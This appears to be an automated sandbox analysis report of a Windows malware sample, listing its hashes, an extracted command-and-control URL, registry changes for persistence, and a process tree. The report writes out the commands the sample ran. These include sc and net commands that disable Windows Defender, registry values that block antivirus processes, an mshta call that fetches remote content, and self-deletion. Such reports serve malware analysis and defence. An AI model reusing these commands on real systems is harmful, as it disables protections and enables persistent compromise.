Analysis
-
max time kernel
150s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
13/10/2024, 15:46
Static task
static1
Behavioral task
behavioral1
Sample
40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe
-
Size
1.7MB
-
MD5
40b55f8f7a059d7109267e849b4baf69
-
SHA1
7443fc2390f77e85cbb02c7c49e9bd9069e09596
-
SHA256
695a146e4bf37574785953b48a0be748459e89fc1a631def17ceefd9def363e1
-
SHA512
da23652f3a0843b8363c3417a6a5935b8016ae5d3dc3ecd6fdf2f20cd151373207de3544f1796867bd7b7f3ebb53c076f1fd86a8c695b8e00d9edad2df2013b2
-
SSDEEP
49152:hTptc8T749F/K8IHjj4gs+S7J/E426tpnWWa:hTptU9NpIDPs+S7J/E96tpba
Malware Config
Extracted
http://pc-guarrantor-utility.com/favicon.ico?0=107&1=66&2=1&3=84&4=i-s&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\kcissy.exe" kcissy.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 16 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe" kcissy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe kcissy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" kcissy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" kcissy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" kcissy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe" kcissy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" kcissy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe kcissy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" kcissy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe kcissy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe kcissy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe kcissy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe kcissy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe kcissy.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe kcissy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" kcissy.exe -
Deletes itself 1 IoCs
pid Process 2800 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2924 kcissy.exe -
Loads dropped DLL 2 IoCs
pid Process 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2212 sc.exe 2916 sc.exe 2004 sc.exe 2016 sc.exe 2972 sc.exe 2512 sc.exe -
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kcissy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2924 kcissy.exe Token: SeShutdownPrivilege 2924 kcissy.exe Token: SeDebugPrivilege 2924 kcissy.exe Token: SeShutdownPrivilege 2924 kcissy.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe 2924 kcissy.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 2116 wrote to memory of 2212 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 30 PID 2116 wrote to memory of 2212 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 30 PID 2116 wrote to memory of 2212 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 30 PID 2116 wrote to memory of 2212 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 30 PID 2116 wrote to memory of 2916 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 31 PID 2116 wrote to memory of 2916 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 31 PID 2116 wrote to memory of 2916 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 31 PID 2116 wrote to memory of 2916 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 31 PID 2116 wrote to memory of 2956 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 34 PID 2116 wrote to memory of 2956 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 34 PID 2116 wrote to memory of 2956 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 34 PID 2116 wrote to memory of 2956 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 34 PID 2116 wrote to memory of 2004 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 35 PID 2116 wrote to memory of 2004 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 35 PID 2116 wrote to memory of 2004 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 35 PID 2116 wrote to memory of 2004 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 35 PID 2116 wrote to memory of 2924 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 38 PID 2116 wrote to memory of 2924 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 38 PID 2116 wrote to memory of 2924 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 38 PID 2116 wrote to memory of 2924 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 38 PID 2956 wrote to memory of 2836 2956 net.exe 39 PID 2956 wrote to memory of 2836 2956 net.exe 39 PID 2956 wrote to memory of 2836 2956 net.exe 39 PID 2956 wrote to memory of 2836 2956 net.exe 39 PID 2924 wrote to memory of 2512 2924 kcissy.exe 40 PID 2924 wrote to memory of 2512 2924 kcissy.exe 40 PID 2924 wrote to memory of 2512 2924 kcissy.exe 40 PID 2924 wrote to memory of 2512 2924 kcissy.exe 40 PID 2924 wrote to memory of 2972 2924 kcissy.exe 41 PID 2924 wrote to memory of 2972 2924 kcissy.exe 41 PID 2924 wrote to memory of 2972 2924 kcissy.exe 41 PID 2924 wrote to memory of 2972 2924 kcissy.exe 41 PID 2924 wrote to memory of 1804 2924 kcissy.exe 42 PID 2924 wrote to memory of 1804 2924 kcissy.exe 42 PID 2924 wrote to memory of 1804 2924 kcissy.exe 42 PID 2924 wrote to memory of 1804 2924 kcissy.exe 42 PID 2924 wrote to memory of 2016 2924 kcissy.exe 43 PID 2924 wrote to memory of 2016 2924 kcissy.exe 43 PID 2924 wrote to memory of 2016 2924 kcissy.exe 43 PID 2924 wrote to memory of 2016 2924 kcissy.exe 43 PID 2116 wrote to memory of 2800 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 44 PID 2116 wrote to memory of 2800 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 44 PID 2116 wrote to memory of 2800 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 44 PID 2116 wrote to memory of 2800 2116 40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe 44 PID 1804 wrote to memory of 2484 1804 net.exe 48 PID 1804 wrote to memory of 2484 1804 net.exe 48 PID 1804 wrote to memory of 2484 1804 net.exe 48 PID 1804 wrote to memory of 2484 1804 net.exe 48 PID 2924 wrote to memory of 2380 2924 kcissy.exe 49 PID 2924 wrote to memory of 2380 2924 kcissy.exe 49 PID 2924 wrote to memory of 2380 2924 kcissy.exe 49 PID 2924 wrote to memory of 2380 2924 kcissy.exe 49
Processes
-
C:\Users\Admin\AppData\Local\Temp\40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\40b55f8f7a059d7109267e849b4baf69_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2212
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2916
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
PID:2836
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2004
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\kcissy.exeC:\Users\Admin\AppData\Roaming\Microsoft\kcissy.exe2⤵
- Modifies WinLogon for persistence
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2512
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2972
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵
- System Location Discovery: System Language Discovery
PID:2484
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2016
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://pc-guarrantor-utility.com/favicon.ico?0=107&1=66&2=1&3=84&4=i-s&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000"3⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2380
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\40B55F~1.EXE" >> NUL2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:2800
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD540b55f8f7a059d7109267e849b4baf69
SHA17443fc2390f77e85cbb02c7c49e9bd9069e09596
SHA256695a146e4bf37574785953b48a0be748459e89fc1a631def17ceefd9def363e1
SHA512da23652f3a0843b8363c3417a6a5935b8016ae5d3dc3ecd6fdf2f20cd151373207de3544f1796867bd7b7f3ebb53c076f1fd86a8c695b8e00d9edad2df2013b2